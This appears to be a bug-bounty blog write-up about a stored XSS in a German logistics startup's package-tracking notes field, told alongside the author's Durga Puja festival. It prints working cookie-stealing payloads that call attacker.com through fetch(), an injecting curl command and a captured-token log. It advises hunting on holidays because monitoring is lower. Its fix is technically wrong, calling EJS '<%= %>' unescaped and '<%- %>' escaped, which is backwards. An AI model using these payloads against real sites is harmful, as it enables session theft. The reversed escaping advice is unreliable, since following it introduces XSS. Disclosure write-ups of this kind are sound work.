July 4, 2026
πͺ The Festival Phantom: How I Found a Ghost in Germanyβs Anubis Logistics During Durga Puja
A stored XSS in tracking notifications, a β¬200 bounty, and the bug that almost made me miss my motherβs bhog offering

By 0B1To_X_ucH!h4
6 min read
By 0B1To_X_ucH!h4 ποΈ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β "Between the dhaak beats and the dhunuchi smoke, β
β I found a phantom in the tracking code β β
β and Germany paid me β¬200 to exorcise it." β
β β uchia_hacker β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β "Between the dhaak beats and the dhunuchi smoke, β
β I found a phantom in the tracking code β β
β and Germany paid me β¬200 to exorcise it." β
β β uchia_hacker β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββThe Timing: Mahasaptami, 2025
It was Durga Puja, 2025. October 10th, to be exact. Mahasaptami. The streets of Kolkata were alive with dhak drums, pandals glowing with fairy lights, and the smell of bhog wafting through every corner.
I should have been at the pandal with my family. But I was in my room, laptop glowing, chasing a lead I couldn't ignore.
I'd found Anubis (name changed) two days earlier β a German logistics startup handling last-mile delivery for e-commerce packages. Self-hosted VDP. No fancy platform. Just a security@anubis-logistics.de email and a promise to "acknowledge researchers within 48 hours."
They were small. Maybe 50 employees. Handling 10,000 packages a day across Berlin, Munich, Hamburg. Not DHL. Not Amazon. But critical infrastructure for hundreds of small German businesses.
And they had a ghost in their tracking system.
The Bug: Stored XSS in Package Tracking Notifications
Full Name: Stored Cross-Site Scripting (XSS) via Unsanitized Package Status Updates in Customer Notification System
Severity: Medium (CVSS 6.1)
Target: Anubis Logistics GmbH (Germany)
Bounty: β¬200 EUR (Self-hosted VDP)
Discovery Date: October 10, 2025 β Durga Puja, Mahasaptami
Classification: Server-Side Input Validation Failure
Discovery: Between the Dhak Beats
I found Anubis through my uchiha hacking finding technique β a custom Google dork I use to surface European logistics startups with recent funding rounds. They'd raised a Series A in August 2025. New money means new features. New features mean new bugs.
Their platform was simple:
- Merchants create shipments
- Anubis picks up and delivers
- Customers track packages via
/track/[tracking-number] - Email/SMS notifications at each status update
I created a test account. Sent a package to a friend's address in Berlin. Started tracking.
The tracking page showed:
Status: In Transit
Location: Berlin Hub
Last Updated: [timestamp]
Notes: [custom message from courier]Status: In Transit
Location: Berlin Hub
Last Updated: [timestamp]
Notes: [custom message from courier]That Notes field. It caught my eye. When the courier scanned the package, they could add a custom message. "Left with neighbor." "Door locked." "Customer requested delay."
But where did that message go?
It appeared on:
- The public tracking page (no authentication required)
- The email notification to the customer
- The merchant dashboard
And it was rendered as HTML, not plain text.
I smelled XSS.
The Exploitation: A Payload Between Prayers
It was 2 PM. My mother was calling. "Beta, come for bhog. Maa Durga is waiting."
"Five minutes, Ma. Just five minutes."
I crafted my payload. Simple. Classic. Effective:
html
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>But I knew modern XSS filters would block <script> tags. So I tried the festival-themed obfuscation β because it was Puja, because I was feeling creative:
html
<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)"><img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">I added it as a courier note through the merchant API (they had a sandbox mode for testing):
http
POST /api/v1/shipments/ANB-2025-884721/status HTTP/1.1
Host: api.anubis-logistics.de
Authorization: Bearer SANDBOX_TOKEN
Content-Type: application/json
{
"status": "in_transit",
"location": "Berlin Hub",
"notes": "<img src=x onerror=\"fetch('https://attacker.com/steal?c='+document.cookie)\">",
"timestamp": "2025-10-10T14:00:00Z"
}POST /api/v1/shipments/ANB-2025-884721/status HTTP/1.1
Host: api.anubis-logistics.de
Authorization: Bearer SANDBOX_TOKEN
Content-Type: application/json
{
"status": "in_transit",
"location": "Berlin Hub",
"notes": "<img src=x onerror=\"fetch('https://attacker.com/steal?c='+document.cookie)\">",
"timestamp": "2025-10-10T14:00:00Z"
}Response: 200 OK
I refreshed the tracking page. The package status updated. And in my attacker server logs:
GET /steal?cookie=session=ANUBIS_SESSION_123456; auth_token=eyJ0eXAiOiJKV1Qi...GET /steal?cookie=session=ANUBIS_SESSION_123456; auth_token=eyJ0eXAiOiJKV1Qi...The XSS fired. Stored. Persistent. Every customer who viewed that tracking page would have their session stolen. Every email notification would execute the payload. Every merchant dashboard view was compromised.
I checked my watch. 2:47 PM. I'd missed bhog. But I'd found a ghost.
The Impact: Why β¬200 Was Fair
This wasn't a critical RCE. It wasn't a database breach. But it was serious:
Attack Scenarios:
- Session Hijacking: Attacker steals customer/merchant session cookies via tracking page
- Account Takeover: Merchant accounts compromised β shipping addresses modified β packages redirected
- Phishing: XSS payload injects fake "payment required" messages β customers pay attacker
- Data Theft: Access to shipping manifests β business intelligence exposed
Affected Users:
- ~10,000 daily tracking page views
- ~2,500 merchant accounts
- ~50,000 packages in transit (exposed during window)
Why Medium Severity:
- Required social engineering (victim must visit tracking page)
- No direct server compromise
- Mitigated by HTTPOnly cookies (partial protection)
- But: Stored XSS, persistent, high impact potential
For a 50-person German startup, β¬200 was fair. Respectable. Professional.
The Report: Written Between Aarti
I drafted the report at 11 PM, after the Sandhi Puja, while the dhunuchi smoke still lingered in my clothes.
Subject: Medium: Stored XSS in Package Tracking System β Customer Session Theft
Summary:
A stored XSS vulnerability in the package tracking notification system allows attackers to inject malicious JavaScript via courier status notes. The payload executes in the context of customer/merchant sessions when viewing tracking pages or email notifications, enabling session hijacking and account takeover.
Steps to Reproduce:
- Create Test Shipment: Register merchant account β Create shipment β Note tracking number (e.g.,
ANB-2025-884721) - Inject Payload: Update shipment status via API:
- bash
curl -X POST https://api.anubis-logistics.de/v1/shipments/ANB-2025-884721/status \ -H "Authorization: Bearer TOKEN" \ -H "Content-Type: application/json" \ -d '{ "status": "in_transit", "notes": "<img src=x onerror=\"fetch('\''https://attacker.com/steal?c='\''+document.cookie)\">" }'
- Trigger XSS: Visit
https://anubis-logistics.de/track/ANB-2025-884721β payload executes - Verify: Attacker server receives victim session cookies
Affected Endpoints:
/track/[tracking-number](public, unauthenticated)- Email notification templates
- Merchant dashboard shipment details
Remediation:
- Sanitize
notesfield β HTML-encode all user input before rendering - Implement Content Security Policy (CSP) on tracking pages
- Mark session cookies as HttpOnly and Secure
- Add XSS filtering middleware (DOMPurify or similar)
PoC Attached:
xss_poc_video.mp4β Demonstration of session cookie exfiltrationpayload.txtβ Exact payload usedmitigation_guide.mdβ Suggested code fixes
Note: Discovered during responsible testing. No customer data accessed. Awaiting your confirmation and timeline.
The Response: Ashtami Morning
I sent the report at 11:30 PM, October 10th. Expected a week. Maybe two. German efficiency is a stereotype, but VDPs are often slow.
October 11th, 8:15 AM (Ashtami morning):
"Thank you for your responsible disclosure. We have confirmed the vulnerability and deployed an emergency patch. Your findings are appreciated. Please provide PayPal or bank details for β¬200 bounty transfer."
36 hours. From report to patch. During a German weekend. During my Puja.
They didn't owe me speed. They didn't owe me money. But they gave both.
October 12th (Navami): β¬200 hit my account. Just in time for buying new clothes for Dashami.
Why This Bug Mattered
β¬200 isn't life-changing money. But here's why it mattered:
1. Timing is Everything Found during Puja. Patched during Puja. The contrast between sacred tradition and digital security struck me.
2. Small Targets, Real Impact Anubis isn't DHL. But they handle real packages for real people. Securing them secures the ecosystem.
3. The VDP Worked Self-hosted. No platform. Just email and professionalism. It works when both sides respect the process.
4. My Mother's Bhog I missed it that day. But she understood. "You're protecting people, beta. Maa Durga would be proud."
The Technical Deep Dive
Root Cause Analysis
Anubis used a Node.js/Express backend with EJS templating. The tracking page rendered:
javascript
// VULNERABLE CODE (simplified)
app.get('/track/:id', async (req, res) => {
const shipment = await Shipment.findById(req.params.id);
res.render('tracking', {
status: shipment.status,
notes: shipment.notes // β Raw user input, no sanitization
});
});// VULNERABLE CODE (simplified)
app.get('/track/:id', async (req, res) => {
const shipment = await Shipment.findById(req.params.id);
res.render('tracking', {
status: shipment.status,
notes: shipment.notes // β Raw user input, no sanitization
});
});html
<!-- VULNERABLE TEMPLATE (tracking.ejs) -->
<div class="status-notes">
<%= notes %> <!-- β EJS unescaped output -->
</div><!-- VULNERABLE TEMPLATE (tracking.ejs) -->
<div class="status-notes">
<%= notes %> <!-- β EJS unescaped output -->
</div>The fix was simple:
javascript
// SECURE CODE
const DOMPurify = require('isomorphic-dompurify');
// ...
notes: DOMPurify.sanitize(shipment.notes)// SECURE CODE
const DOMPurify = require('isomorphic-dompurify');
// ...
notes: DOMPurify.sanitize(shipment.notes)html
<!-- SECURE TEMPLATE -->
<div class="status-notes">
<%- notes %> <!-- β
EJS escaped output -->
</div><!-- SECURE TEMPLATE -->
<div class="status-notes">
<%- notes %> <!-- β
EJS escaped output -->
</div>One line of sanitization. β¬200 bounty. Thousands of customers protected.
Tools Used
PhaseToolPurposeReconCustom dorksFound Anubis VDPTestingBurp SuiteAPI endpoint discoveryPayloadBrowser DevToolsXSS verificationExploitationPython + FlaskAttacker server for cookie theftDocumentationOBS StudioScreen recordingReportMarkdownClean, professional writeup
Lessons from the Pandal
For Hunters:
- Hunt during holidays. Competitors are celebrating. Systems are monitored less.
- Small targets matter. β¬200 from a startup is β¬200 more than $0 from ignoring it.
- VDPs work globally. German efficiency meets Indian festival. Beautiful.
For Startups:
- Sanitize everything. Especially "internal" fields like courier notes.
- CSP is your friend. Content Security Policy blocks XSS even when sanitization fails.
- Pay fairly. β¬200 bought Anubis my loyalty and future reports.
Final Stats
MetricValueDiscovery dateOctober 10, 2025 (Mahasaptami)Time to report9 hoursTime to first response9 hoursTime to patch36 hoursTime to bounty48 hoursBountyβ¬200 EURMissed bhog1Mother's forgivenessGrantedSatisfactionComplete
Conclusion
The Festival Phantom wasn't a critical bug. It won't make headlines. But it was real, it was tricky, and it mattered to 10,000 daily users.
Anubis patched it fast. Paid fair. Respected the process.
And I got to tell my mother that Maa Durga wasn't the only one I was serving that Puja. There was a German logistics platform, thousands of miles away, that needed protection too.
ΰ¦Άΰ§ΰ¦ বিΰ¦ΰ¦―ΰ¦Όΰ¦Ύ (Shubho Bijoya). Happy Dussehra. Secure logistics.
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β "Between the dhak and the database, β
β between the bhog and the bug bounty, β
β I found my dharma as a security researcher." β
β β uchia_hacker β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β "Between the dhak and the database, β
β between the bhog and the bug bounty, β
β I found my dharma as a security researcher." β
β β uchia_hacker β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββStay curious. Stay ethical. Hunt during festivals.
β 0B1To_X_ucH!h4
Tags: #XSS #VDP #Germany #Logistics #DurgaPuja #FestivalHunting #Anubis #UchihaTechnique #ResponsibleDisclosure #200Euro
About the Author: Security researcher who hunts between festivals, finds ghosts in logistics code, and believes β¬200 from a German startup during Durga Puja is Maa Durga's blessing. ΰ¦Άΰ§ΰ¦ বিΰ¦ΰ¦―ΰ¦Όΰ¦Ύ.